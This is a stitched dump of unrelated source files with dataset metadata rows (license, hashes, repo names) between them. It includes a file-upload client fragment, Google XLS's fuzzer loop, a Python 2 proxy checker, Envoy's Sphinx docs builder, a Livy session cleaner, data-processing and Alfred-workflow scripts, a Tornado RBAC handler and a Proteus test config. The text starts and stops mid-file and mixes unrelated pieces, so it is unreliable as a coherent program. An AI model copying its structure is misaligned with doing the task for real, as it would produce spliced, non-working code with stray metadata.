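#     {"status": "working"}   -> keep polling
#     {"status": "success"}   -> download the result file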
def uploadFile(fileName):
"""Uploads file to the cloud"""
# 1. RETRIEVE PRESIGNED URL TO UPLOAD FILE.
# Prepare URL for 'Get Presigned URL' API request
url = "{}/file/upload/get-presigned-url?contenttype=application/octet-stream&name={}".format(
BASE_URL, os.path.basename(fileName))
# Execute request and get response as JSON
response = requests.get(url)
if (response.status_code == 200):
json = response.json()
if json["error"] == False:
# URL to use for file upload
uploadUrl = json["presignedUrl"]
# URL for future reference
uploadedFileUrl = json["url"]
# 2. UPLOAD FILE TO CLOUD.
with open(fileName, 'rb') as file:
requests.put(uploadUrl, data=file, headers={ "content-type": "application/octet-stream" })
return uploadedFileUrl
else:
# Show service reported error
print(json["message"])
else:
print(f"Request error: {response.status_code} {response.reason}")
return None
if __name__ == '__main__':
main()
|
apache-2.0
| 6,094,854,437,032,515,000 | 32.828571 | 110 | 0.576135 | false |
google/xls
|
xls/fuzzer/run_fuzz.py
|
1
|
9053
|
# Lint as: python3
# Copyright 2020 The XLS Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Fuzzer generate-and-compare loop."""
import os
import shutil
import stat
import subprocess
import tempfile
import time
from typing import Tuple, Text, Optional
from absl import logging
import termcolor
from xls.common import runfiles
from xls.fuzzer import sample_runner
from xls.fuzzer import sample_summary_pb2
from xls.fuzzer.python import cpp_ast_generator as ast_generator
from xls.fuzzer.python import cpp_sample as sample
SAMPLE_RUNNER_MAIN_PATH = runfiles.get_path('xls/fuzzer/sample_runner_main')
IR_MINIMIZER_MAIN_PATH = runfiles.get_path('xls/tools/ir_minimizer_main')
SUMMARIZE_IR_MAIN_PATH = runfiles.get_path('xls/fuzzer/summarize_ir_main')
FIND_FAILING_INPUT_MAIN = runfiles.get_path(
'xls/fuzzer/find_failing_input_main')
def _write_to_file(dir_path: Text,
filename: Text,
content: Text,
executable: bool = False):
"""Writes the content into a file of the given name in the directory."""
path = os.path.join(dir_path, filename)
with open(path, 'w') as f:
f.write(content)
if executable:
st = os.stat(path)
os.chmod(path, st.st_mode | stat.S_IXUSR)
def _write_ir_summaries(run_dir: str,
timing: sample_summary_pb2.SampleTimingProto,
summary_path: str):
"""Appends IR summaries of IR files in the run dir to the summary file."""
args = []
unoptimized_path = os.path.join(run_dir, 'sample.ir')
if os.path.exists(unoptimized_path):
args.append('--unoptimized_ir=' + unoptimized_path)
optimized_path = os.path.join(run_dir, 'sample.opt.ir')
if os.path.exists(optimized_path):
args.append('--optimized_ir=' + optimized_path)
if not args:
return
subprocess.run(
[
SUMMARIZE_IR_MAIN_PATH,
'--logtostderr',
'--minloglevel=2',
'--summary_file=' + summary_path,
'--timing=' + str(timing),
] + args,
check=False)
def run_sample(smp: sample.Sample,
run_dir: Text,
summary_file: Optional[Text] = None,
generate_sample_ns: Optional[int] = None):
"""Runs the given sample in the given directory.
Args:
smp: Sample to run.
run_dir: Directory to run the sample in. The directory should exist and be
empty.
summary_file: The (optional) file to append sample summary.
generate_sample_ns: The (optional) time in nanoseconds to generate the
sample. Recorded in the summary file, if given.
Raises:
sample_runner.SampleError: on any non-zero status from the sample runner.
"""
start = time.time()
_write_to_file(run_dir, 'sample.x', smp.input_text)
_write_to_file(run_dir, 'options.json', smp.options.to_json())
if smp.args_batch:
_write_to_file(run_dir, 'args.txt',
sample.args_batch_to_text(smp.args_batch))
# Create a script named 'run.sh' for rerunning the sample.
args = [
SAMPLE_RUNNER_MAIN_PATH, '--logtostderr', '--input_file=sample.x',
'--options_file=options.json'
]
if smp.args_batch:
args.append('--args_file=args.txt')
args.append(run_dir)
_write_to_file(
run_dir,
'run.sh',
f'#!/bin/sh\n\n{subprocess.list2cmdline(args)}\n',
executable=True)
logging.vlog(1, 'Starting to run sample')
logging.vlog(2, smp.input_text)
runner = sample_runner.SampleRunner(run_dir)
runner.run_from_files('sample.x', 'options.json', 'args.txt')
timing = runner.timing
timing.total_ns = int((time.time() - start) * 1e9)
if generate_sample_ns:
# The sample generation time, if given, is not part of the measured total
# time, so add it in.
timing.total_ns += generate_sample_ns
timing.generate_sample_ns = generate_sample_ns
logging.vlog(1, 'Completed running sample, elapsed: %0.2fs',
time.time() - start)
if summary_file:
_write_ir_summaries(run_dir, timing, summary_file)
def minimize_ir(smp: sample.Sample,
run_dir: Text,
inject_jit_result: Optional[Text] = None) -> Optional[Text]:
"""Tries to minimize the IR of the given sample in the run directory.
    Writes a test script into the run directory for testing the IR for the
failure. Passes this test script to ir_minimizer_main to try to create a
minimal IR sample.
Args:
smp: The sample to try to minimize.
run_dir: The run directory the sample was run in.
inject_jit_result: For testing only. Value to produce as the JIT result.
Returns:
The path to the minimized IR file (created in the run directory), or None if
minimization was not possible
"""
if os.path.exists(os.path.join(run_dir, 'sample.ir')):
# First try to minimize using the sample runner binary as the minimization
# test.
ir_minimize_options = smp.options.replace(input_is_dslx=False)
_write_to_file(run_dir, 'ir_minimizer.options.json',
ir_minimize_options.to_json())
# Generate the sample runner script. The script should return 0 (success) if
# the sample fails so invert the return code of the invocation of
# sample_runner_main with '!'.
args = [
SAMPLE_RUNNER_MAIN_PATH, '--logtostderr',
'--options_file=ir_minimizer.options.json', '--args_file=args.txt',
'--input_file=$1'
]
_write_to_file(
run_dir,
'ir_minimizer_test.sh',
f'#!/bin/sh\n! {" ".join(args)}',
executable=True)
comp = subprocess.run([
IR_MINIMIZER_MAIN_PATH, '--logtostderr',
'--test_executable=ir_minimizer_test.sh', 'sample.ir'
],
cwd=run_dir,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
check=False)
if comp.returncode == 0:
minimized_ir_path = os.path.join(run_dir, 'minimized.ir')
with open(minimized_ir_path, 'wb') as f:
f.write(comp.stdout)
return minimized_ir_path
if smp.options.use_jit:
# Next try to minimize assuming the underlying cause was a JIT mismatch.
# The IR minimizer binary has special machinery for reducing these kinds
# of failures. The minimization occurs in two steps:
# (1) Find an input that results in a JIT vs interpreter mismatch (if any)
# (2) Run the minimization tool using this input as the test.
extra_args = ['--test_only_inject_jit_result=' +
inject_jit_result] if inject_jit_result else []
comp = subprocess.run(
[FIND_FAILING_INPUT_MAIN, '--input_file=args.txt', 'sample.ir'] +
extra_args,
cwd=run_dir,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
check=False)
if comp.returncode == 0:
# A failing input for JIT vs interpreter was found
failed_input = comp.stdout.decode('utf-8')
comp = subprocess.run(
[
IR_MINIMIZER_MAIN_PATH, '--logtostderr', '--test_llvm_jit',
'--use_optimization_pipeline', '--input=' + failed_input,
'sample.ir'
] + extra_args,
cwd=run_dir,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
check=False)
if comp.returncode == 0:
minimized_ir_path = os.path.join(run_dir, 'minimized.ir')
with open(minimized_ir_path, 'wb') as f:
f.write(comp.stdout)
return minimized_ir_path
return None
def run_fuzz(
rng: ast_generator.RngState,
ast_generator_options: ast_generator.AstGeneratorOptions,
calls_per_sample: int,
save_temps: bool,
sample_count: int,
codegen: bool,
simulate: bool = False,
return_samples: bool = False) -> Optional[Tuple[sample.Sample, ...]]:
"""Runs a fuzzing loop for "sample_count" samples."""
samples = []
for i in range(sample_count):
smp = ast_generator.generate_sample(
ast_generator_options, calls_per_sample,
sample.SampleOptions(
convert_to_ir=True,
optimize_ir=True,
codegen=codegen,
simulate=simulate), rng)
if return_samples:
samples.append(smp)
termcolor.cprint('=== Sample {}'.format(i), color='yellow')
print(smp.input_text)
sample_dir = tempfile.mkdtemp('run_fuzz_')
run_sample(smp, sample_dir)
if not save_temps:
shutil.rmtree(sample_dir)
if return_samples:
return tuple(samples)
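# Example call (sketch; argument values are illustrative, and construction
# of the RngState is omitted since it depends on the cpp_ast_generator
# bindings):
#
#     run_fuzz(rng, ast_generator.AstGeneratorOptions(), calls_per_sample=8,
#              save_temps=True, sample_count=5, codegen=False)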
|
apache-2.0
| 5,578,746,314,929,599,000 | 33.819231 | 80 | 0.637026 | false |
chenpengwuli/chris
|
check_proxy.py
|
1
|
1296
|
#coding=utf-8
import urllib2
import urllib
import time
import socket
ip_check_url = 'http://www.google.com.hk/'
user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0'
socket_timeout = 30
# Check proxy
def check_proxy(protocol, pip):
try:
proxy_handler = urllib2.ProxyHandler({protocol:pip})
opener = urllib2.build_opener(proxy_handler)
        # opener.addheaders = [('User-agent', user_agent)]  # Enabling this line breaks the check; the cause is unknown.
urllib2.install_opener(opener)
req = urllib2.Request(ip_check_url)
time_start = time.time()
conn = urllib2.urlopen(req)
# conn = urllib2.urlopen(ip_check_url)
time_end = time.time()
detected_pip = conn.read()
proxy_detected = True
except urllib2.HTTPError, e:
print "ERROR: Code ", e.code
return False
except Exception, detail:
print "ERROR: ", detail
return False
return proxy_detected
def main():
socket.setdefaulttimeout(socket_timeout)
print
protocol = "http"
current_proxy = "212.82.126.32:80"
proxy_detected = check_proxy(protocol, current_proxy)
if proxy_detected:
print (" WORKING: " + current_proxy)
else:
print " FAILED: %s " % ( current_proxy, )
if __name__ == '__main__':
main()
|
gpl-3.0
| -6,451,803,214,406,931,000 | 23.076923 | 87 | 0.662141 | false |
envoyproxy/envoy
|
tools/docs/sphinx_runner.py
|
1
|
7417
|
import argparse
import os
import platform
import re
import sys
import tarfile
import tempfile
from functools import cached_property
import yaml
from colorama import Fore, Style
from sphinx.cmd.build import main as sphinx_build
from tools.base import runner
class SphinxBuildError(Exception):
pass
class SphinxEnvError(Exception):
pass
class SphinxRunner(runner.Runner):
_build_dir = "."
_build_sha = "UNKNOWN"
@property
def blob_sha(self) -> str:
"""Returns either the version tag or the current build sha"""
return self.docs_tag or self.build_sha
@property
def build_dir(self) -> str:
"""Returns current build_dir - most likely a temp directory"""
return self._build_dir
@property
def build_sha(self) -> str:
"""Returns either a provided build_sha or a default"""
return self.args.build_sha or self._build_sha
@cached_property
def colors(self) -> dict:
"""Color scheme for build summary"""
return dict(chrome=Fore.LIGHTYELLOW_EX, key=Fore.LIGHTCYAN_EX, value=Fore.LIGHTMAGENTA_EX)
@cached_property
def config_file(self) -> str:
"""Populates a config file with self.configs and returns the file path"""
with open(self.config_file_path, "w") as f:
f.write(yaml.dump(self.configs))
return self.config_file_path
@property
def config_file_path(self) -> str:
"""Path to a (temporary) build config"""
return os.path.join(self.build_dir, "build.yaml")
@cached_property
def configs(self) -> str:
"""Build configs derived from provided args"""
_configs = dict(
version_string=self.version_string,
release_level=self.release_level,
blob_sha=self.blob_sha,
version_number=self.version_number,
docker_image_tag_name=self.docker_image_tag_name)
if self.validator_path:
_configs["validator_path"] = self.validator_path
if self.descriptor_path:
_configs["descriptor_path"] = self.descriptor_path
return _configs
@property
def descriptor_path(self) -> str:
"""Path to a descriptor file for config validation"""
return os.path.abspath(self.args.descriptor_path)
@property
def docker_image_tag_name(self) -> str:
"""Tag name of current docker image"""
return re.sub(r"([0-9]+\.[0-9]+)\.[0-9]+.*", r"v\1-latest", self.version_number)
@property
def docs_tag(self) -> str:
"""Tag name - ie named version for this docs build"""
return self.args.docs_tag
@cached_property
def html_dir(self) -> str:
"""Path to (temporary) directory for outputting html"""
return os.path.join(self.build_dir, "generated/html")
@property
def output_filename(self) -> str:
"""Path to tar file for saving generated html docs"""
return self.args.output_filename
@property
def py_compatible(self) -> bool:
"""Current python version is compatible"""
return bool(sys.version_info.major == 3 and sys.version_info.minor >= 8)
@property
def release_level(self) -> str:
"""Current python version is compatible"""
return "tagged" if self.docs_tag else "pre-release"
@cached_property
def rst_dir(self) -> str:
"""Populates an rst directory with contents of given rst tar,
and returns the path to the directory
"""
rst_dir = os.path.join(self.build_dir, "generated/rst")
if self.rst_tar:
with tarfile.open(self.rst_tar) as tarfiles:
tarfiles.extractall(path=rst_dir)
return rst_dir
@property
def rst_tar(self) -> str:
"""Path to the rst tarball"""
return self.args.rst_tar
@property
def sphinx_args(self) -> list:
"""Command args for sphinx"""
return ["-W", "--keep-going", "--color", "-b", "html", self.rst_dir, self.html_dir]
@property
def validator_path(self) -> str:
"""Path to validator utility for validating snippets"""
return os.path.abspath(self.args.validator_path)
@property
def version_file(self) -> str:
"""Path to version files for deriving docs version"""
return self.args.version_file
@cached_property
def version_number(self) -> str:
"""Semantic version"""
with open(self.version_file) as f:
return f.read().strip()
@property
def version_string(self) -> str:
"""Version string derived from either docs_tag or build_sha"""
return (
f"tag-{self.docs_tag}"
if self.docs_tag else f"{self.version_number}-{self.build_sha[:6]}")
def add_arguments(self, parser: argparse.ArgumentParser) -> None:
parser.add_argument("--build_sha")
parser.add_argument("--docs_tag")
parser.add_argument("--version_file")
parser.add_argument("--validator_path")
parser.add_argument("--descriptor_path")
parser.add_argument("rst_tar")
parser.add_argument("output_filename")
def build_html(self) -> None:
if sphinx_build(self.sphinx_args):
raise SphinxBuildError("BUILD FAILED")
def build_summary(self) -> None:
print()
print(self._color("#### Sphinx build configs #####################"))
print(self._color("###"))
for k, v in self.configs.items():
print(f"{self._color('###')} {self._color(k, 'key')}: {self._color(v, 'value')}")
print(self._color("###"))
print(self._color("###############################################"))
print()
def check_env(self) -> None:
if not self.py_compatible:
raise SphinxEnvError(
f"ERROR: python version must be >= 3.8, you have {platform.python_version()}")
if not self.configs["release_level"] == "tagged":
return
if f"v{self.version_number}" != self.docs_tag:
raise SphinxEnvError(
"Given git tag does not match the VERSION file content:"
f"{self.docs_tag} vs v{self.version_number}")
with open(os.path.join(self.rst_dir, "version_history/current.rst")) as f:
            if self.version_number not in f.read():
raise SphinxEnvError(
f"Git tag ({self.version_number}) not found in version_history/current.rst")
def create_tarball(self) -> None:
with tarfile.open(self.output_filename, "w") as tar:
tar.add(self.html_dir, arcname=".")
def run(self) -> int:
with tempfile.TemporaryDirectory() as build_dir:
return self._run(build_dir)
def _color(self, msg, name=None):
return f"{self.colors[name or 'chrome']}{msg}{Style.RESET_ALL}"
def _run(self, build_dir):
self._build_dir = build_dir
os.environ["ENVOY_DOCS_BUILD_CONFIG"] = self.config_file
try:
self.check_env()
except SphinxEnvError as e:
print(e)
return 1
self.build_summary()
try:
self.build_html()
except SphinxBuildError as e:
print(e)
return 1
        self.create_tarball()
        return 0
def main(*args) -> int:
return SphinxRunner(*args).run()
if __name__ == "__main__":
sys.exit(main(*sys.argv[1:]))
|
apache-2.0
| 2,763,211,751,225,945,000 | 31.530702 | 98 | 0.593771 | false |
hongchhe/myhadoop
|
spark/scripts/cleansessions.py
|
1
|
1346
|
import requests
def cleanUnUsedLivySessions(sparkHost = 'http://spark-master0:8998', \
sessionState=['idle', 'error', 'shutting_down', 'dead', 'success'], pyFiles = []):
    '''Delete Livy sessions whose state marks them as no longer in use.'''
host = sparkHost
sessionData = {
'kind': 'pyspark',
'pyFiles': pyFiles
}
headers = {'Content-Type': 'application/json'}
rootSessionsUrl = host + '/sessions'
curSessionsReqJson = requests.get(rootSessionsUrl, headers=headers).json()
    # If there are any sessions, clean all but the last one whose state is
    # in the "sessionState" list. Delete the last session only if its state
    # is in the ['error', 'dead', 'success'] list.
if (curSessionsReqJson['total'] > 0):
for sessionItem in curSessionsReqJson['sessions'][:-1]:
if (sessionItem['state'] in sessionState) :
sessionUrl = "{0}/{1}".format(rootSessionsUrl, sessionItem['id'])
requests.delete(sessionUrl)
        # Handle the last session specially: delete it only in terminal states.
        lastOneStatesLt = ['error', 'dead', 'success']
        if curSessionsReqJson['sessions'][-1]['state'] in lastOneStatesLt:
            sessionUrl = "{0}/{1}".format(rootSessionsUrl, curSessionsReqJson['sessions'][-1]['id'])
            requests.delete(sessionUrl)
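# Example /sessions response (sketch; only the fields used above):
#
#     {"from": 0, "total": 2, "sessions": [{"id": 0, "state": "idle"},
#                                          {"id": 1, "state": "running"}]}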
cleanUnUsedLivySessions()
|
apache-2.0
| 7,989,615,120,050,437,000 | 39.787879 | 102 | 0.618128 | false |
ibis-project/ibis
|
ibis/backends/base/sql/registry/string.py
|
1
|
2959
|
import ibis.expr.operations as ops
from . import helpers
def substring(translator, expr):
op = expr.op()
arg, start, length = op.args
arg_formatted = translator.translate(arg)
start_formatted = translator.translate(start)
# Impala is 1-indexed
if length is None or isinstance(length.op(), ops.Literal):
lvalue = length.op().value if length is not None else None
if lvalue:
return 'substr({}, {} + 1, {})'.format(
arg_formatted, start_formatted, lvalue
)
else:
return 'substr({}, {} + 1)'.format(arg_formatted, start_formatted)
else:
length_formatted = translator.translate(length)
return 'substr({}, {} + 1, {})'.format(
arg_formatted, start_formatted, length_formatted
)
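# Example (sketch): a substring over a column rendered as `col`, starting at
# literal index 1 with literal length 3, yields "substr(col, 1 + 1, 3)".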
def string_find(translator, expr):
op = expr.op()
arg, substr, start, _ = op.args
arg_formatted = translator.translate(arg)
substr_formatted = translator.translate(substr)
if start is not None and not isinstance(start.op(), ops.Literal):
start_fmt = translator.translate(start)
return 'locate({}, {}, {} + 1) - 1'.format(
substr_formatted, arg_formatted, start_fmt
)
elif start is not None and start.op().value:
sval = start.op().value
return 'locate({}, {}, {}) - 1'.format(
substr_formatted, arg_formatted, sval + 1
)
else:
return 'locate({}, {}) - 1'.format(substr_formatted, arg_formatted)
def find_in_set(translator, expr):
op = expr.op()
arg, str_list = op.args
arg_formatted = translator.translate(arg)
str_formatted = ','.join([x._arg.value for x in str_list])
return "find_in_set({}, '{}') - 1".format(arg_formatted, str_formatted)
def string_join(translator, expr):
op = expr.op()
arg, strings = op.args
return helpers.format_call(translator, 'concat_ws', arg, *strings)
def string_like(translator, expr):
arg, pattern, _ = expr.op().args
return '{} LIKE {}'.format(
translator.translate(arg), translator.translate(pattern)
)
def parse_url(translator, expr):
op = expr.op()
arg, extract, key = op.args
arg_formatted = translator.translate(arg)
if key is None:
return "parse_url({}, '{}')".format(arg_formatted, extract)
else:
key_fmt = translator.translate(key)
return "parse_url({}, '{}', {})".format(
arg_formatted, extract, key_fmt
)
def startswith(translator, expr):
arg, start = expr.op().args
arg_formatted = translator.translate(arg)
start_formatted = translator.translate(start)
return f"{arg_formatted} like concat({start_formatted}, '%')"
def endswith(translator, expr):
arg, start = expr.op().args
arg_formatted = translator.translate(arg)
end_formatted = translator.translate(start)
return f"{arg_formatted} like concat('%', {end_formatted})"
|
apache-2.0
| -8,646,182,163,526,600,000 | 28.59 | 78 | 0.612031 | false |
yubowenok/vastcha15
|
proc/gc_proc_meta.py
|
1
|
2449
|
# must run after mc1_proc_meta.py
import time, sys
from dateutil.parser import parse
files = [
"MC2/comm-data-Fri.csv",
"MC2/comm-data-Sat.csv",
"MC2/comm-data-Sun.csv",
]
locationCounter, idCounter = 0, 0
ids, locations, events = {}, {}, {}
# get meta data
file_meta = open("MC1.meta", 'r')
num_people = int(file_meta.readline())
for i in range(num_people):
tokens = file_meta.readline().rstrip('\n').split(' ')
index, id = int(tokens[0]), int(tokens[1])
ids[id] = index
num_events = int(file_meta.readline())
for i in range(num_events):
tokens = file_meta.readline().rstrip('\n').split(' ')
index, event = int(tokens[0]), tokens[1]
events[event] = index
file_meta.close()
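# Layout of MC1.meta assumed by the reads above (inferred from this parser):
#   <num_people>
#   <index> <id>       (num_people lines)
#   <num_events>
#   <index> <event>    (num_events lines)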
idCounter = len(ids)
cnt = 0
for file_name in files:
file = open(file_name)
first_line = True
for line in file:
if first_line:
first_line = False # skip first line
continue
tokens = line.split(',')
id1, id2, location = int(tokens[1]), tokens[2], tokens[3].rstrip('\n')
if id2 == "external":
id2 = 9999999 # not used in data
else:
id2 = int(id2)
if location not in locations:
locations[location] = locationCounter
locationCounter += 1
if id1 not in ids:
ids[id1] = idCounter
idCounter += 1
if id2 not in ids:
ids[id2] = idCounter
idCounter += 1
cnt += 1
if cnt % 100000 == 0:
print >> sys.stderr, cnt
print >> sys.stderr, file_name + " complete"
# ids
ids_sorted = []
for key, value in ids.iteritems():
ids_sorted.append([key, value])
# events
events_sorted = []
for key, value in events.iteritems():
events_sorted.append([key, value])
# locations
locations_sorted = []
for key, value in locations.iteritems():
locations_sorted.append([key, value])
# sorting
ids_sorted.sort(key = lambda x: x[1])
events_sorted.sort(key = lambda x: x[1])
locations_sorted.sort(key = lambda x: x[1])
# write meta data to a text file
file_meta = open("GC.meta", 'w')
n = len(ids_sorted) # number of people
file_meta.write("%d\n" % n)
for row in ids_sorted:
file_meta.write("%d %d\n" % (row[1], row[0]))
n = len(events_sorted) # number of events
file_meta.write("%d\n" % n)
for row in events_sorted:
file_meta.write("%d %s\n" % (row[1], row[0]))
n = len(locations_sorted) # number of locations
file_meta.write("%d\n" % n)
for row in locations_sorted:
file_meta.write("%d %s\n" % (row[1], row[0]))
file_meta.close()
|
mit
| 7,298,783,781,361,091,000 | 24.510417 | 74 | 0.627195 | false |
ejsuncy/alfred-angular-snippets
|
script.py
|
1
|
3869
|
#!/usr/bin/python
# encoding: utf-8
import sys
import re
from workflow import Workflow3, ICON_INFO
import json
__github_slug__ = 'ejsuncy/alfred-angular-snippets'
log = None
var_regex = re.compile("\${(.*?):(.*?)}")
cursor_regex = re.compile("\$0")
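# Illustration of the patterns above: var_regex matches VS Code snippet
# placeholders such as "${1:name}" (group 1 == "1", group 2 == "name");
# cursor_regex matches the final-cursor marker "$0".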
def main(wf):
# Process magic args
sys_args = wf.args
query = sys.argv[1].split()
keyword = query[0]
if (keyword):
results = wf.filter(keyword, snippets.keys())
for result in results:
snippet_name = result
snippet_description = snippets[result]['description']
snippet_body = "\n".join(snippets[result]['body'])
subtitle = snippet_description
valid = True
autocomplete = result
# if len(query) > 1:
# subtitle += ": add %s" % snippet_name
# valid = True
# autocomplete = None
item = wf.add_item(title=snippet_name,
subtitle=subtitle,
valid=valid,
arg="potato",
autocomplete=autocomplete)
# var_names = []
# name = query[1] # after snippet keyword, the next arg is always the name
# Name = [name[0].upper() if len(name) == 1 else name[0].upper() + name[1:]][0]
match_iter = var_regex.finditer(snippet_body) # finds all the variables of pattern ${1:varname}
# if len(query) > 1:
for match in match_iter:
var_name = match.group(2)
var_string = re.escape(match.group(0))
snippet_body = re.sub(var_string, "%s" % var_name, snippet_body) # replace ${1:varname} with varname (VS Code -> alfred)
# if "name" == var_string:
# var_name_value = name
# elif "Name" == var_string:
# var_name_value = Name
# elif "ServiceName" == var_string:
# var_name_value = Name
# elif "eventName" == var_string:
# var_name_value = name
# if var_name == "selector-name":
# var_name = "selectorName"
# item.setvar(var_name, 'selector-' + str(query[var_index]).lower())
# elif var_name == "Name":
# uppercased = query[var_index][0].upper()
# if len(query[var_index]) > 1:
# uppercased += query[var_index][1:]
# item.setvar(var_name, uppercased)
# else:
# var_name = var_name.replace("-", "")
# item.setvar(var_name, query[var_index])
# var_names.append(var_name)
snippet_body = re.sub(cursor_regex, "{cursor}", snippet_body)
item.setvar('snippetBody', snippet_body)
# item.setvar('varNames', " ".join(var_names))
wf.send_feedback()
def get_snippets():
snippets = {}
with open("snippets/typescript.json") as f:
json_str = f.read()
snippets.update(json.loads(json_str))
with open("snippets/html.json") as f:
json_str = f.read()
snippets.update(json.loads(json_str))
return snippets
if __name__ == '__main__':
update_settings = {
'github_slug': __github_slug__
}
wf = Workflow3(libraries=['./lib'], update_settings = update_settings)
if wf.update_available:
wf.add_item('New version available',
'Action this item to install the update',
autocomplete='workflow:update',
icon=ICON_INFO)
global snippets
snippets = wf.cached_data('snippets', get_snippets, max_age=0)
# Assign Workflow logger to a global variable for convenience
log = wf.logger
sys.exit(wf.run(main))
|
mit
| 9,202,923,877,124,489,000 | 30.201613 | 136 | 0.514345 | false |
hulingfeng211/weixin
|
handler/rbac.py
|
1
|
3569
|
# -*- coding:utf-8 -*-
# Handles the admin views for role and permission management (RBAC).
import json
import logging
from bson.objectid import ObjectId
from tornado.gen import coroutine
from tornado.web import RequestHandler, HTTPError
from core import bson_encode, is_json_request, generate_response, clone_dict_without_id
from core.utils import make_password
from handler import CRUDHandler
__author__ = 'george'
class UserHandler(RequestHandler):
@coroutine
def get(self, *args, **kwargs):
user_id=args[0] if len(args)>0 else None
db=self.settings['db']
if user_id:
user =yield db.user.find_one({"_id":ObjectId(user_id)})
self.write(bson_encode(user))
else:
users=yield db.user.find({}).to_list(length=None)
self.write(bson_encode(users))
@coroutine
def delete(self, *args, **kwargs):
id = args[0] if len(args) > 0 else None
if id:
db = self.settings['db']
yield db.user.remove({"_id": ObjectId(id)})
@coroutine
def post(self, *args, **kwargs):
if is_json_request(self.request):
body=json.loads(self.request.body)
else:
            raise HTTPError(status_code=500,log_message="Only Content-Type: application/json is supported")
db=self.settings['db']
if body.get('_id',None):#update
user_dict=clone_dict_without_id(body)
user_dict.pop('password')
yield db.user.update({"_id":ObjectId(body.get('_id'))},{
"$set":user_dict
})
else:
body['password']=make_password(body.get('password','111111'))
yield db.user.insert(body)
        self.write(generate_response(message="Saved successfully"))
class MenuHandler(RequestHandler):
def get(self, *args, **kwargs):
db=self.settings['dbsync']
def get_node_child(node):
if not node:
return
child_list=db.menu.find({"parent_uid":node.get('uid')})
node['children']=[]
node['children']=[get_node_child(item) for item in child_list]
return node
        if len(args) > 0 and args[0] == 'all_leaf':  # fetch all the leaf nodes
leaf_node=list(db.menu.find({"is_leaf":True}))
self.write(bson_encode(leaf_node))
else:
root_node= db.menu.find({"parent_uid":{"$exists":False}})
result=[get_node_child(itm) for itm in root_node]
self.write(bson_encode(result))
def post(self, *args, **kwargs):
if is_json_request(self.request):
body=json.loads(self.request.body)
else:
            raise HTTPError(status_code=500,log_message="Only Content-Type: application/json is supported")
db=self.settings['dbsync']
db.menu.remove({})
def save_node(item):
for innerItem in item.get('children',[]):
save_node(innerItem)
item['selected']=False
item['is_leaf']=len(item['children'])==0
item.pop('children')
db.menu.insert(item)
#body is array
for item in body:
save_node(item)
route=[
(r'/rbac/user',UserHandler),
(r'/rbac/user/(.*)',UserHandler),
(r'/rbac/menu',MenuHandler),
(r'/rbac/menu/(.*)',MenuHandler),
(r'/rbac/role',CRUDHandler,{'cname':'role'}),
(r'/rbac/role/(.*)',CRUDHandler,{'cname':'role'}),
(r'/rbac/permission',CRUDHandler,{'cname':'permission'}),
(r'/rbac/permission/(.*)',CRUDHandler,{'cname':'permission'})
]
|
apache-2.0
| -4,920,719,644,731,826,000 | 33.99 | 91 | 0.578165 | false |
erdc/proteus
|
proteus/tests/ProjScheme_with_EV/NS_convergence.py
|
1
|
8019
|
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
from past.utils import old_div
from math import *
import proteus.MeshTools
from proteus import Domain
from proteus.default_n import *
from proteus.Profiling import logEvent
from .parameters import *
manufactured_solution = 2 #1: u.n!=0, 2: u.n=0
# ----- PARAMETERS ABOUT STABILIZATION OF NS ----- #
# see parameters.py
# ----- OTHER IMPORTANT PARAMETERS FOR CONVERGENCE TEST ----- #
KILL_PRESSURE_TERM = False #True just for debugging
Refinement = 0
mu = 1.0
ns_forceStrongDirichlet = False
# ----- ENTROPY VISCOSITY PARAMETERS ----- #
cE = 1.0
cMax = 1.0
# ----- numerical options to RANS3PF ----- #
fixNullSpace_PresInc = True
INTEGRATE_BY_PARTS_DIV_U_PresInc = True
CORRECT_VELOCITY = True
# ----- Discretization -- input options ----- #
genMesh = True
movingDomain = False
useOldPETSc = False
useSuperlu = True
timeDiscretization = 'vbdf' # 'vbdf', 'be', 'flcbdf'
spaceOrder = 2
pspaceOrder = 1
useHex = False
useMetrics = 0.0
useVF = 0.0
useRBLES=0.0
# Input checks
if spaceOrder not in [1, 2]:
    print("INVALID: spaceOrder " + str(spaceOrder))
sys.exit()
if useMetrics not in [0.0, 1.0]:
print("INVALID: useMetrics")
sys.exit()
# Discretization
nd = 2
if spaceOrder == 1:
hFactor = 1.0
if useHex:
basis = C0_AffineLinearOnCubeWithNodalBasis
elementQuadrature = CubeGaussQuadrature(nd, 2)
elementBoundaryQuadrature = CubeGaussQuadrature(nd - 1, 2)
else:
basis = C0_AffineLinearOnSimplexWithNodalBasis
elementQuadrature = SimplexGaussQuadrature(nd, 3)
elementBoundaryQuadrature = SimplexGaussQuadrature(nd - 1, 3)
elif spaceOrder == 2:
hFactor = 0.5
if useHex:
basis = C0_AffineLagrangeOnCubeWithNodalBasis
elementQuadrature = CubeGaussQuadrature(nd, 4)
elementBoundaryQuadrature = CubeGaussQuadrature(nd - 1, 4)
else:
basis = C0_AffineQuadraticOnSimplexWithNodalBasis
elementQuadrature = SimplexGaussQuadrature(nd, 5)
elementBoundaryQuadrature = SimplexGaussQuadrature(nd - 1, 5)
if pspaceOrder == 1:
if useHex:
pbasis = C0_AffineLinearOnCubeWithNodalBasis
else:
pbasis = C0_AffineLinearOnSimplexWithNodalBasis
elif pspaceOrder == 2:
if useHex:
pbasis = C0_AffineLagrangeOnCubeWithNodalBasis
else:
pbasis = C0_AffineQuadraticOnSimplexWithNodalBasis
# Domain and mesh
L = (1.0, 1.0)
he = old_div(L[0],float(4*Refinement-1))
he*=0.5
he*=0.5
weak_bc_penalty_constant = 1E6
nLevels = 1
#parallelPartitioningType = proteus.MeshTools.MeshParallelPartitioningTypes.element
parallelPartitioningType = proteus.MeshTools.MeshParallelPartitioningTypes.node
nLayersOfOverlapForParallel = 0
structured = False
if useHex:
nnx = 4 * Refinement + 1
nny = 2 * Refinement + 1
hex = True
domain = Domain.RectangularDomain(L)
else:
boundaries = ['left', 'right', 'bottom', 'top', 'front', 'back']
boundaryTags = dict([(key, i + 1) for (i, key) in enumerate(boundaries)])
